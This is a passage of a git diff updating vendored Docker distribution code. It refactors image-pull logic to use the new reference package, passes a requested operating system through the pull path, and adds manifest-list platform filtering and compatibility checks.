imagePullConfig.RegistryService.LookupPullEndpoints(repoInfo.Hostname()) + endpoints, err := imagePullConfig.RegistryService.LookupPullEndpoints(reference.Domain(repoInfo.Name)) if err != nil { return err } @@ -104,14 +107,20 @@ func Pull(ctx context.Context, ref reference.Named, imagePullConfig *ImagePullCo } } - logrus.Debugf("Trying to pull %s from %s %s", repoInfo.Name(), endpoint.URL, endpoint.Version) + logrus.Debugf("Trying to pull %s from %s %s", reference.FamiliarName(repoInfo.Name), endpoint.URL, endpoint.Version) puller, err := newPuller(endpoint, repoInfo, imagePullConfig) if err != nil { lastErr = err continue } - if err := puller.Pull(ctx, ref); err != nil { + + // Make sure we default the OS if it hasn't been supplied + if imagePullConfig.OS == "" { + imagePullConfig.OS = runtime.GOOS + } + + if err := puller.Pull(ctx, ref, imagePullConfig.OS); err != nil { // Was this pull cancelled? If so, don't try to fall // back. fallback := false @@ -139,19 +148,19 @@ func Pull(ctx context.Context, ref reference.Named, imagePullConfig *ImagePullCo // append subsequent errors lastErr = err } - logrus.Errorf("Attempting next endpoint for pull after error: %v", err) + logrus.Infof("Attempting next endpoint for pull after error: %v", err) continue } logrus.Errorf("Not continuing with pull after error: %v", err) return TranslatePullError(err, ref) } - imagePullConfig.ImageEventLogger(ref.String(), repoInfo.Name(), "pull") + imagePullConfig.ImageEventLogger(reference.FamiliarString(ref), reference.FamiliarName(repoInfo.Name), "pull") return nil } if lastErr == nil { - lastErr = fmt.Errorf("no endpoints found for %s", ref.String()) + lastErr = fmt.Errorf("no endpoints found for %s", reference.FamiliarString(ref)) } return TranslatePullError(lastErr, ref) @@ -170,17 +179,14 @@ func writeStatus(requestedTag string, out progress.Output, layersDownloaded bool } // ValidateRepoName validates the name of a repository. -func ValidateRepoName(name string) error { - if name == "" { - return fmt.Errorf("Repository name can't be empty") - } - if name == api.NoBaseImageSpecifier { - return fmt.Errorf("'%s' is a reserved name", api.NoBaseImageSpecifier) +func ValidateRepoName(name reference.Named) error { + if reference.FamiliarName(name) == api.NoBaseImageSpecifier { + return errors.WithStack(reservedNameError(api.NoBaseImageSpecifier)) } return nil } -func addDigestReference(store reference.Store, ref reference.Named, dgst digest.Digest, id digest.Digest) error { +func addDigestReference(store refstore.Store, ref reference.Named, dgst digest.Digest, id digest.Digest) error { dgstRef, err := reference.WithDigest(reference.TrimNamed(ref), dgst) if err != nil { return err @@ -192,7 +198,7 @@ func addDigestReference(store reference.Store, ref reference.Named, dgst digest. logrus.Errorf("Image ID for digest %s changed from %s to %s, cannot update", dgst.String(), oldTagID, id) } return nil - } else if err != reference.ErrDoesNotExist { + } else if err != refstore.ErrDoesNotExist { return err } diff --git a/vendor/github.com/docker/docker/distribution/pull_v1.go b/vendor/github.com/docker/docker/distribution/pull_v1.go index f44ed4f371..c26d881223 100644 --- a/vendor/github.com/docker/docker/distribution/pull_v1.go +++ b/vendor/github.com/docker/docker/distribution/pull_v1.go @@ -1,6 +1,7 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "errors" "fmt" "io" @@ -11,7 +12,8 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" + "github.com/docker/distribution/reference" + "github.com/docker/distribution/registry/client/auth" "github.com/docker/distribution/registry/client/transport" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/distribution/xfer" @@ -22,9 +24,8 @@ import ( "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/progress" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" "github.com/docker/docker/registry" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) type v1Puller struct { @@ -35,7 +36,7 @@ type v1Puller struct { session *registry.Session } -func (p *v1Puller) Pull(ctx context.Context, ref reference.Named) error { +func (p *v1Puller) Pull(ctx context.Context, ref reference.Named, os string) error { if _, isCanonical := ref.(reference.Canonical); isCanonical { // Allowing fallback, because HTTPS v1 is before HTTP v2 return fallbackError{err: ErrNoSupport{Err: errors.New("Cannot pull by digest with v1 registry")}} @@ -49,14 +50,10 @@ func (p *v1Puller) Pull(ctx context.Context, ref reference.Named) error { tr := transport.NewTransport( // TODO(tiborvass): was ReceiveTimeout registry.NewTransport(tlsConfig), - registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)..., + registry.Headers(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)..., ) client := registry.HTTPClient(tr) - v1Endpoint, err := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders) - if err != nil { - logrus.Debugf("Could not get v1 endpoint: %v", err) - return fallbackError{err: err} - } + v1Endpoint := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders) p.session, err = registry.NewSession(client, p.config.AuthConfig, v1Endpoint) if err != nil { // TODO(dmcgowan): Check if should fallback @@ -67,23 +64,25 @@ func (p *v1Puller) Pull(ctx context.Context, ref reference.Named) error { // TODO(dmcgowan): Check if should fallback return err } - progress.Message(p.config.ProgressOutput, "", p.repoInfo.FullName()+": this image was pulled from a legacy registry. Important: This registry version will not be supported in future versions of docker.") + progress.Message(p.config.ProgressOutput, "", p.repoInfo.Name.Name()+": this image was pulled from a legacy registry. Important: This registry version will not be supported in future versions of docker.") return nil } -func (p *v1Puller) pullRepository(ctx context.Context, ref reference.Named) error { - progress.Message(p.config.ProgressOutput, "", "Pulling repository "+p.repoInfo.FullName()) +// Note use auth.Scope rather than reference.Named due to this warning causing Jenkins CI to fail: +// warning: ref can be github.com/docker/docker/vendor/github.com/docker/distribution/registry/client/auth.Scope (interfacer) +func (p *v1Puller) pullRepository(ctx context.Context, ref auth.Scope) error { + progress.Message(p.config.ProgressOutput, "", "Pulling repository "+p.repoInfo.Name.Name()) tagged, isTagged := ref.(reference.NamedTagged) - repoData, err := p.session.GetRepositoryData(p.repoInfo) + repoData, err := p.session.GetRepositoryData(p.repoInfo.Name) if err != nil { if strings.Contains(err.Error(), "HTTP code: 404") { if isTagged { - return fmt.Errorf("Error: image %s:%s not found", p.repoInfo.RemoteName(), tagged.Tag()) + return fmt.Errorf("Error: image %s:%s not found", reference.Path(p.repoInfo.Name), tagged.Tag()) } - return fmt.Errorf("Error: image %s not found", p.repoInfo.RemoteName()) + return fmt.Errorf("Error: image %s not found", reference.Path(p.repoInfo.Name)) } // Unexpected HTTP error return err @@ -92,13 +91,13 @@ func (p *v1Puller) pullRepository(ctx context.Context, ref reference.Named) erro logrus.Debug("Retrieving the tag list") var tagsList map[string]string if !isTagged { - tagsList, err = p.session.GetRemoteTags(repoData.Endpoints, p.repoInfo) + tagsList, err = p.session.GetRemoteTags(repoData.Endpoints, p.repoInfo.Name) } else { var tagID string tagsList = make(map[string]string) - tagID, err = p.session.GetRemoteTag(repoData.Endpoints, p.repoInfo, tagged.Tag()) + tagID, err = p.session.GetRemoteTag(repoData.Endpoints, p.repoInfo.Name, tagged.Tag()) if err == registry.ErrRepoNotFound { - return fmt.Errorf("Tag %s not found in repository %s", tagged.Tag(), p.repoInfo.FullName()) + return fmt.Errorf("Tag %s not found in repository %s", tagged.Tag(), p.repoInfo.Name.Name()) } tagsList[tagged.Tag()] = tagID } @@ -127,7 +126,7 @@ func (p *v1Puller) pullRepository(ctx context.Context, ref reference.Named) erro } } - writeStatus(ref.String(), p.config.ProgressOutput, layersDownloaded) + writeStatus(reference.FamiliarString(ref), p.config.ProgressOutput, layersDownloaded) return nil } @@ -137,7 +136,7 @@ func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.Reposit return nil } - localNameRef, err := reference.WithTag(p.repoInfo, img.Tag) + localNameRef, err := reference.WithTag(p.repoInfo.Name, img.Tag) if err != nil { retErr := fmt.Errorf("Image (id: %s) has invalid tag: %s", img.ID, img.Tag) logrus.Debug(retErr.Error()) @@ -148,15 +147,15 @@ func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.Reposit return err } - progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s", img.Tag, p.repoInfo.FullName()) + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s", img.Tag, p.repoInfo.Name.Name()) success := false var lastErr error for _, ep := range p.repoInfo.Index.Mirrors { ep += "v1/" - progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), fmt.Sprintf("Pulling image (%s) from %s, mirror: %s", img.Tag, p.repoInfo.FullName(), ep)) + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), fmt.Sprintf("Pulling image (%s) from %s, mirror: %s", img.Tag, p.repoInfo.Name.Name(), ep)) if err = p.pullImage(ctx, img.ID, ep, localNameRef, layersDownloaded); err != nil { // Don't report errors when pulling from mirrors. - logrus.Debugf("Error pulling image (%s) from %s, mirror: %s, %s", img.Tag, p.repoInfo.FullName(), ep, err) + logrus.Debugf("Error pulling image (%s) from %s, mirror: %s, %s", img.Tag, p.repoInfo.Name.Name(), ep, err) continue } success = true @@ -164,12 +163,12 @@ func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.Reposit } if !success { for _, ep := range repoData.Endpoints { - progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s, endpoint: %s", img.Tag, p.repoInfo.FullName(), ep) + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s, endpoint: %s", img.Tag, p.repoInfo.Name.Name(), ep) if err = p.pullImage(ctx, img.ID, ep, localNameRef, layersDownloaded); err != nil { // It's not ideal that only the last error is returned, it would be better to concatenate the errors. // As the error is also given to the output stream the user will see the error. lastErr = err - progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Error pulling image (%s) from %s, endpoint: %s, %s", img.Tag, p.repoInfo.FullName(), ep, err) + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Error pulling image (%s) from %s, endpoint: %s, %s", img.Tag, p.repoInfo.Name.Name(), ep, err) continue } success = true @@ -177,7 +176,7 @@ func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.Reposit } } if !success { - err := fmt.Errorf("Error pulling image (%s) from %s, %v", img.Tag, p.repoInfo.FullName(), lastErr) + err := fmt.Errorf("Error pulling image (%s) from %s, %v", img.Tag, p.repoInfo.Name.Name(), lastErr) progress.Update(p.config.ProgressOutput, stringid.TruncateID(img.ID), err.Error()) return err } @@ -232,7 +231,7 @@ func (p *v1Puller) pullImage(ctx context.Context, v1ID, endpoint string, localNa } rootFS := image.NewRootFS() - resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, descriptors, p.config.ProgressOutput) + resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, "", descriptors, p.config.ProgressOutput) if err != nil { return err } diff --git a/vendor/github.com/docker/docker/distribution/pull_v2.go b/vendor/github.com/docker/docker/distribution/pull_v2.go index 88807edc7d..60a894b1c3 100644 --- a/vendor/github.com/docker/docker/distribution/pull_v2.go +++ b/vendor/github.com/docker/docker/distribution/pull_v2.go @@ -1,21 +1,21 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "encoding/json" - "errors" "fmt" "io" "io/ioutil" "net/url" "os" "runtime" + "strings" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/manifestlist" "github.com/docker/distribution/manifest/schema1" "github.com/docker/distribution/manifest/schema2" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/api/errcode" "github.com/docker/distribution/registry/client/auth" "github.com/docker/distribution/registry/client/transport" @@ -27,9 +27,13 @@ import ( "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/progress" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" + "github.com/docker/docker/pkg/system" + refstore "github.com/docker/docker/reference" "github.com/docker/docker/registry" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" + specs "github.com/opencontainers/image-spec/specs-go/v1" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) var ( @@ -59,7 +63,7 @@ type v2Puller struct { confirmedV2 bool } -func (p *v2Puller) Pull(ctx context.Context, ref reference.Named) (err error) { +func (p *v2Puller) Pull(ctx context.Context, ref reference.Named, os string) (err error) { // TODO(tiborvass): was ReceiveTimeout p.repo, p.confirmedV2, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "pull") if err != nil { @@ -67,12 +71,11 @@ func (p *v2Puller) Pull(ctx context.Context, ref reference.Named) (err error) { return err } - if err = p.pullV2Repository(ctx, ref); err != nil { + if err = p.pullV2Repository(ctx, ref, os); err != nil { if _, ok := err.(fallbackError); ok { return err } - if continueOnError(err) { - logrus.Errorf("Error trying v2 registry: %v", err) + if continueOnError(err, p.endpoint.Mirror) { return fallbackError{ err: err, confirmedV2: p.confirmedV2, @@ -83,10 +86,10 @@ func (p *v2Puller) Pull(ctx context.Context, ref reference.Named) (err error) { return err } -func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named) (err error) { +func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named, os string) (err error) { var layersDownloaded bool if !reference.IsNameOnly(ref) { - layersDownloaded, err = p.pullV2Tag(ctx, ref) + layersDownloaded, err = p.pullV2Tag(ctx, ref, os) if err != nil { return err } @@ -108,7 +111,7 @@ func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named) (e if err != nil { return err } - pulledNew, err := p.pullV2Tag(ctx, tagRef) + pulledNew, err := p.pullV2Tag(ctx, tagRef, os) if err != nil { // Since this is the pull-all-tags case, don't // allow an error pulling a particular tag to @@ -124,13 +127,14 @@ func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named) (e } } - writeStatus(ref.String(), p.config.ProgressOutput, layersDownloaded) + writeStatus(reference.FamiliarString(ref), p.config.ProgressOutput, layersDownloaded) return nil } type v2LayerDescriptor struct { digest digest.Digest + diffID layer.DiffID repoInfo *registry.RepositoryInfo repo distribution.Repository V2MetadataService metadata.V2MetadataService @@ -148,6 +152,9 @@ func (ld *v2LayerDescriptor) ID() string { } func (ld *v2LayerDescriptor) DiffID() (layer.DiffID, error) { + if ld.diffID != "" { + return ld.diffID, nil + } return ld.V2MetadataService.GetDiffID(ld.digest) } @@ -228,10 +235,7 @@ func (ld *v2LayerDescriptor) Download(ctx context.Context, progressOutput progre defer reader.Close() if ld.verifier == nil { - ld.verifier, err = digest.NewDigestVerifier(ld.digest) - if err != nil { - return nil, 0, xfer.DoNotRetry{Err: err} - } + ld.verifier = ld.digest.Verifier() } _, err = io.Copy(tmpFile, io.TeeReader(reader, ld.verifier)) @@ -320,10 +324,10 @@ func (ld *v2LayerDescriptor) truncateDownloadFile() error { func (ld *v2LayerDescriptor) Registered(diffID layer.DiffID) { // Cache mapping from this layer's DiffID to the blobsum - ld.V2MetadataService.Add(diffID, metadata.V2Metadata{Digest: ld.digest, SourceRepository: ld.repoInfo.FullName()}) + ld.V2MetadataService.Add(diffID, metadata.V2Metadata{Digest: ld.digest, SourceRepository: ld.repoInfo.Name.Name()}) } -func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdated bool, err error) { +func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named, os string) (tagUpdated bool, err error) { manSvc, err := p.repo.Manifests(ctx) if err != nil { return false, err @@ -333,20 +337,20 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat manifest distribution.Manifest tagOrDigest string // Used for logging/progress only ) - if tagged, isTagged := ref.(reference.NamedTagged); isTagged { - manifest, err = manSvc.Get(ctx, "", distribution.WithTag(tagged.Tag())) - if err != nil { - return false, allowV1Fallback(err) - } - tagOrDigest = tagged.Tag() - } else if digested, isDigested := ref.(reference.Canonical); isDigested { + if digested, isDigested := ref.(reference.Canonical); isDigested { manifest, err = manSvc.Get(ctx, digested.Digest()) if err != nil { return false, err } tagOrDigest = digested.Digest().String() + } else if tagged, isTagged := ref.(reference.NamedTagged); isTagged { + manifest, err = manSvc.Get(ctx, "", distribution.WithTag(tagged.Tag())) + if err != nil { + return false, allowV1Fallback(err) + } + tagOrDigest = tagged.Tag() } else { - return false, fmt.Errorf("internal error: reference has neither a tag nor a digest: %s", ref.String()) + return false, fmt.Errorf("internal error: reference has neither a tag nor a digest: %s", reference.FamiliarString(ref)) } if manifest == nil { @@ -366,7 +370,7 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat if configClass == "" { configClass = "unknown" } - return false, fmt.Errorf("target is %s", configClass) + return false, invalidManifestClassError{m.Manifest.Config.MediaType, configClass} } } @@ -374,8 +378,8 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat // the other side speaks the v2 protocol. p.confirmedV2 = true - logrus.Debugf("Pulling ref from V2 registry: %s", ref.String()) - progress.Message(p.config.ProgressOutput, tagOrDigest, "Pulling from "+p.repo.Named().Name()) + logrus.Debugf("Pulling ref from V2 registry: %s", reference.FamiliarString(ref)) + progress.Message(p.config.ProgressOutput, tagOrDigest, "Pulling from "+reference.FamiliarName(p.repo.Named())) var ( id digest.Digest @@ -387,22 +391,22 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat if p.config.RequireSchema2 { return false, fmt.Errorf("invalid manifest: not schema2") } - id, manifestDigest, err = p.pullSchema1(ctx, ref, v) + id, manifestDigest, err = p.pullSchema1(ctx, ref, v, os) if err != nil { return false, err } case *schema2.DeserializedManifest: - id, manifestDigest, err = p.pullSchema2(ctx, ref, v) + id, manifestDigest, err = p.pullSchema2(ctx, ref, v, os) if err != nil { return false, err } case *manifestlist.DeserializedManifestList: - id, manifestDigest, err = p.pullManifestList(ctx, ref, v) + id, manifestDigest, err = p.pullManifestList(ctx, ref, v, os) if err != nil { return false, err } default: - return false, errors.New("unsupported manifest format") + return false, invalidManifestFormatError{} } progress.Message(p.config.ProgressOutput, "", "Digest: "+manifestDigest.String()) @@ -413,7 +417,7 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat if oldTagID == id { return false, addDigestReference(p.config.ReferenceStore, ref, manifestDigest, id) } - } else if err != reference.ErrDoesNotExist { + } else if err != refstore.ErrDoesNotExist { return false, err } @@ -433,7 +437,7 @@ func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdat return true, nil } -func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Named, unverifiedManifest *schema1.SignedManifest) (id digest.Digest, manifestDigest digest.Digest, err error) { +func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Reference, unverifiedManifest *schema1.SignedManifest, requestedOS string) (id digest.Digest, manifestDigest digest.Digest, err error) { var verifiedManifest *schema1.Manifest verifiedManifest, err = verifySchema1Manifest(unverifiedManifest, ref) if err != nil { @@ -485,7 +489,33 @@ func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Named, unverif descriptors = append(descriptors, layerDescriptor) } - resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, descriptors, p.config.ProgressOutput) + // The v1 manifest itself doesn't directly contain an OS. However, + // the history does, but unfortunately that's a string, so search through + // all the history until hopefully we find one which indicates the OS. + // supertest2014/nyan is an example of a registry image with schemav1. + configOS := runtime.GOOS + if system.LCOWSupported() { + type config struct { + Os string `json:"os,omitempty"` + } + for _, v := range verifiedManifest.History { + var c config + if err := json.Unmarshal([]byte(v.V1Compatibility), &c); err == nil { + if c.Os != "" { + configOS = c.Os + break + } + } + } + } + + // Early bath if the requested OS doesn't match that of the configuration. + // This avoids doing the download, only to potentially fail later. + if !strings.EqualFold(configOS, requestedOS) { + return "", "", fmt.Errorf("cannot download image with operating system %q when requesting %q", configOS, requestedOS) + } + + resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, configOS, descriptors, p.config.ProgressOutput) if err != nil { return "", "", err } @@ -506,7 +536,7 @@ func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Named, unverif return imageID, manifestDigest, nil } -func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *schema2.DeserializedManifest) (id digest.Digest, manifestDigest digest.Digest, err error) { +func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *schema2.DeserializedManifest, requestedOS string) (id digest.Digest, manifestDigest digest.Digest, err error) { manifestDigest, err = schema2ManifestDigest(ref, mfst) if err != nil { return "", "", err @@ -536,15 +566,18 @@ func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *s } configChan := make(chan []byte, 1) - errChan := make(chan error, 1) + configErrChan := make(chan error, 1) + layerErrChan := make(chan error, 1) + downloadsDone := make(chan struct{}) var cancel func() ctx, cancel = context.WithCancel(ctx) + defer cancel() // Pull the image config go func() { configJSON, err := p.pullSchema2Config(ctx, target.Digest) if err != nil { - errChan <- ImageConfigPullError{Err: err} + configErrChan <- ImageConfigPullError{Err: err} cancel() return } @@ -552,9 +585,11 @@ func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *s }() var ( - configJSON []byte // raw serialized image config - downloadedRootFS *image.RootFS // rootFS from registered layers - configRootFS *image.RootFS // rootFS from configuration + configJSON []byte // raw serialized image config + downloadedRootFS *image.RootFS // rootFS from registered layers + configRootFS *image.RootFS // rootFS from configuration + release func() // release resources from rootFS download + configPlatform *specs.Platform // for LCOW when registering downloaded layers ) // https://github.com/docker/docker/issues/24766 - Err on the side of caution, @@ -566,52 +601,81 @@ func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *s // check to block Windows images being pulled on Linux is implemented, it // may be necessary to perform the same type of serialisation. if runtime.GOOS == "windows" { - configJSON, configRootFS, err = receiveConfig(p.config.ImageStore, configChan, errChan) + configJSON, configRootFS, configPlatform, err = receiveConfig(p.config.ImageStore, configChan, configErrChan) if err != nil { return "", "", err } - if configRootFS == nil { return "", "", errRootFSInvalid } + if err := checkImageCompatibility(configPlatform.OS, configPlatform.OSVersion); err != nil { + return "", "", err + } + + if len(descriptors) != len(configRootFS.DiffIDs) { + return "", "", errRootFSMismatch + } + + // Early bath if the requested OS doesn't match that of the configuration. + // This avoids doing the download, only to potentially fail later. + if !strings.EqualFold(configPlatform.OS, requestedOS) { + return "", "", fmt.Errorf("cannot download image with operating system %q when requesting %q", configPlatform.OS, requestedOS) + } + + // Populate diff ids in descriptors to avoid downloading foreign layers + // which have been side loaded + for i := range descriptors { + descriptors[i].(*v2LayerDescriptor).diffID = configRootFS.DiffIDs[i] + } } if p.config.DownloadManager != nil { - downloadRootFS := *image.NewRootFS() - rootFS, release, err := p.config.DownloadManager.Download(ctx, downloadRootFS, descriptors, p.config.ProgressOutput) - if err != nil { - if configJSON != nil { - // Already received the config - return "", "", err - } - select { - case err = <-errChan: - return "", "", err - default: - cancel() - select { - case <-configChan: - case <-errChan: - } - return "", "", err + go func() { + var ( + err error + rootFS image.RootFS + ) + downloadRootFS := *image.NewRootFS() + rootFS, release, err = p.config.DownloadManager.Download(ctx, downloadRootFS, requestedOS, descriptors, p.config.ProgressOutput) + if err != nil { + // Intentionally do not cancel the config download here + // as the error from config download (if there is one) + // is more interesting than the layer download error + layerErrChan <- err + return } - } - if release != nil { - defer release() - } - downloadedRootFS = &rootFS + downloadedRootFS = &rootFS + close(downloadsDone) + }() + } else { + // We have nothing to download + close(downloadsDone) } if configJSON == nil { - configJSON, configRootFS, err = receiveConfig(p.config.ImageStore, configChan, errChan) + configJSON, configRootFS, _, err = receiveConfig(p.config.ImageStore, configChan, configErrChan) + if err == nil && configRootFS == nil { + err = errRootFSInvalid + } if err != nil { + cancel() + select { + case <-downloadsDone: + case <-layerErrChan: + } return "", "", err } + } - if configRootFS == nil { - return "", "", errRootFSInvalid - } + select { + case <-downloadsDone: + case err = <-layerErrChan: + return "", "", err + } + + if release != nil { + defer release() } if downloadedRootFS != nil { @@ -637,42 +701,50 @@ func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *s return imageID, manifestDigest, nil } -func receiveConfig(s ImageConfigStore, configChan <-chan []byte, errChan <-chan error) ([]byte, *image.RootFS, error) { +func receiveConfig(s ImageConfigStore, configChan <-chan []byte, errChan <-chan error) ([]byte, *image.RootFS, *specs.Platform, error) { select { case configJSON := <-configChan: rootfs, err := s.RootFSFromConfig(configJSON) if err != nil { - return nil, nil, err + return nil, nil, nil, err } - return configJSON, rootfs, nil + platform, err := s.PlatformFromConfig(configJSON) + if err != nil { + return nil, nil, nil, err + } + return configJSON, rootfs, platform, nil case err := <-errChan: - return nil, nil, err + return nil, nil, nil, err // Don't need a case for ctx.Done in the select because cancellation // will trigger an error in p.pullSchema2ImageConfig. } } // pullManifestList handles "manifest lists" which point to various -// platform-specifc manifests. -func (p *v2Puller) pullManifestList(ctx context.Context, ref reference.Named, mfstList *manifestlist.DeserializedManifestList) (id digest.Digest, manifestListDigest digest.Digest, err error) { +// platform-specific manifests. +func (p *v2Puller) pullManifestList(ctx context.Context, ref reference.Named, mfstList *manifestlist.DeserializedManifestList, os string) (id digest.Digest, manifestListDigest digest.Digest, err error) { manifestListDigest, err = schema2ManifestDigest(ref, mfstList) if err != nil { return "", "", err } - var manifestDigest digest.Digest - for _, manifestDescriptor := range mfstList.Manifests { - // TODO(aaronl): The manifest list spec supports optional - // "features" and "variant" fields. These are not yet used. - // Once they are, their values should be interpreted here. - if manifestDescriptor.Platform.Architecture == runtime.GOARCH && manifestDescriptor.Platform.OS == runtime.GOOS { - manifestDigest = manifestDescriptor.Digest - break - } + logrus.Debugf("%s resolved to a manifestList object with %d entries; looking for a %s/%s match", ref, len(mfstList.Manifests), os, runtime.GOARCH) + + manifestMatches := filterManifests(mfstList.Manifests, os) + + if len(manifestMatches) == 0 { + errMsg := fmt.Sprintf("no matching manifest for %s/%s in the manifest list entries", os, runtime.GOARCH) + logrus.Debugf(errMsg) + return "", "", errors.New(errMsg) } - if manifestDigest == "" { - return "", "", errors.New("no supported platform found in manifest list") + if len(manifestMatches) > 1 { + logrus.Debugf("found multiple matches in manifest list, choosing best match %s", manifestMatches[0].Digest.String()) + } + manifestDigest := manifestMatches[0].Digest + + if err := checkImageCompatibility(manifestMatches[0].Platform.OS, manifestMatches[0].Platform.OSVersion); err != nil { + return "", "", err } manSvc, err := p.repo.Manifests(ctx) @@ -692,12 +764,12 @@ func (p *v2Puller) pullManifestList(ctx context.Context, ref reference.Named, mf switch v := manifest.(type) { case *schema1.SignedManifest: - id, _, err = p.pullSchema1(ctx, manifestRef, v) + id, _, err = p.pullSchema1(ctx, manifestRef, v, os) if err != nil { return "", "", err } case *schema2.DeserializedManifest: - id, _, err = p.pullSchema2(ctx, manifestRef, v) + id, _, err = p.pullSchema2(ctx, manifestRef, v, os) if err != nil { return "", "", err } @@ -716,10 +788,7 @@ func (p *v2Puller) pullSchema2Config(ctx context.Context, dgst digest.Digest) (c } // Verify image config digest - verifier, err := digest.NewDigestVerifier(dgst) - if err != nil { - return nil, err - } + verifier := dgst.Verifier() if _, err := verifier.Write(configJSON); err != nil { return nil, err } @@ -742,10 +811,7 @@ func schema2ManifestDigest(ref reference.Named, mfst distribution.Manifest) (dig // If pull by digest, then verify the manifest digest. if digested, isDigested := ref.(reference.Canonical); isDigested { - verifier, err := digest.NewDigestVerifier(digested.Digest()) - if err != nil { - return "", err - } + verifier := digested.Digest().Verifier() if _, err := verifier.Write(canonical); err != nil { return "", err } @@ -793,15 +859,12 @@ func allowV1Fallback(err error) error { return err } -func verifySchema1Manifest(signedManifest *schema1.SignedManifest, ref reference.Named) (m *schema1.Manifest, err error) { +func verifySchema1Manifest(signedManifest *schema1.SignedManifest, ref reference.Reference) (m *schema1.Manifest, err error) { // If pull by digest, then verify the manifest digest. NOTE: It is // important to do this first, before any other content validation. If the // digest cannot be verified, don't even bother with those other things. if digested, isCanonical := ref.(reference.Canonical); isCanonical { - verifier, err := digest.NewDigestVerifier(digested.Digest()) - if err != nil { - return nil, err - } + verifier := digested.Digest().Verifier() if _, err := verifier.Write(signedManifest.Canonical); err != nil { return nil, err } @@ -814,13 +877,13 @@ func verifySchema1Manifest(signedManifest *schema1.SignedManifest, ref reference m = &signedManifest.Manifest if m.SchemaVersion != 1 { - return nil, fmt.Errorf("unsupported schema version %d for %q", m.SchemaVersion, ref.String()) + return nil, fmt.Errorf("unsupported schema version %d for %q", m.SchemaVersion, reference.FamiliarString(ref)) } if len(m.FSLayers) != len(m.History) { - return nil, fmt.Errorf("length of history not equal to number of layers for %q", ref.String()) + return nil, fmt.Errorf("length of history not equal to number of layers for %q", reference.FamiliarString(ref)) } if len(m.FSLayers) == 0 { - return nil, fmt.Errorf("no FSLayers in manifest for %q", ref.String()) + return nil, fmt.Errorf("no FSLayers in manifest for %q", reference.FamiliarString(ref)) } return m, nil } @@ -866,7 +929,7 @@ func fixManifestLayers(m *schema1.Manifest) error { m.FSLayers = append(m.FSLayers[:i], m.FSLayers[i+1:]...) m.History = append(m.History[:i], m.History[i+1:]...) } else if imgs[i].Parent != imgs[i+1].ID { - return fmt.Errorf("Invalid parent ID. Expected %v, got %v.", imgs[i+1].ID, imgs[i].Parent) + return fmt.Errorf("invalid parent ID. Expected %v, got %v", imgs[i+1].ID, imgs[i].Parent) } } diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_test.go b/vendor/github.com/docker/docker/distribution/pull_v2_test.go index b745642e3b..ca3470c8cf 100644 --- a/vendor/github.com/docker/docker/distribution/pull_v2_test.go +++ b/vendor/github.com/docker/docker/distribution/pull_v2_test.go @@ -1,4 +1,4 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( "encoding/json" 